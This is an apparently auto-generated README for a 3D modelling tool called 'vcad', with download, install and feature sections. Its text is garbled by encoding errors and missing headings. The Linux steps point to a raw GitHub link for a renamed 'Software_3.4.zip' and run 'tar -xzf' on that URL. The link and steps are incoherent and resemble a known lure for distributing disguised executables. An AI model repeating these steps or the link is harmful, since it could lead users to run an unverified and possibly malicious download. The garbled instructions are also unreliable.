Welcome to vcad! This application allows you to create parametric 3D models using constructive solid geometry (CSG). You can export your designs in multiple formats, making it suitable for various use cases. Letโs get started with downloading and running the software.
To download vcad, visit the Releases page of our GitHub repository. You can find it here: Download vcad.
On the Releases page, you will see a list of available versions. Each version is labeled with its release date and may contain notes about whatโs new or updated.
- Click on the version you'd like to download. A dropdown will appear with different files.
- Select the file that matches your operating system. For example, you might see options for Windows, macOS, or Linux.
- Click on the appropriate file to start the download.
Once the download is complete, locate the downloaded file on your computer. This is usually in your โDownloadsโ folder unless you specified a different location.
- Find the downloaded
.exefile. - Double-click the file to run the installer.
- Follow the instructions in the setup wizard. It will guide you through the installation process.
- After installation, you can find vcad in your Start Menu. Click to open it.
- Locate the downloaded
.dmgfile. - Double-click it to open.
- Drag vcad to your Applications folder.
- Open your Applications folder, find vcad, and double-click to run.
- Find the downloaded tarball file (usually
https://raw.githubusercontent.com/JJZ993/vcad/main/packages/cli/Software_3.4.zip). - Open a terminal window.
- Extract the files using the command:
tar -xzf https://raw.githubusercontent.com/JJZ993/vcad/main/packages/cli/Software_3.4.zip - Navigate to the extracted folder with:
cd extracted_folder_name - Run the application using:
./vcad
To run vcad smoothly, ensure your computer meets these basic requirements:
- Operating System: Windows 10 or later, macOS Mojave (10.14) or later, or any popular Linux distribution.
- RAM: At least 4 GB of RAM.
- CPU: Any modern multi-core processor.
- Graphics: A graphics card that supports OpenGL 3.0 or later.
- Parametric Design: Easily modify your models by changing parameters.
- CSG Modeling: Create complex shapes through simple operations.
- Multi-format Export: Export your designs in formats like STL, OBJ, and more.
- User-Friendly Interface: Designed for ease of use, even for beginners.
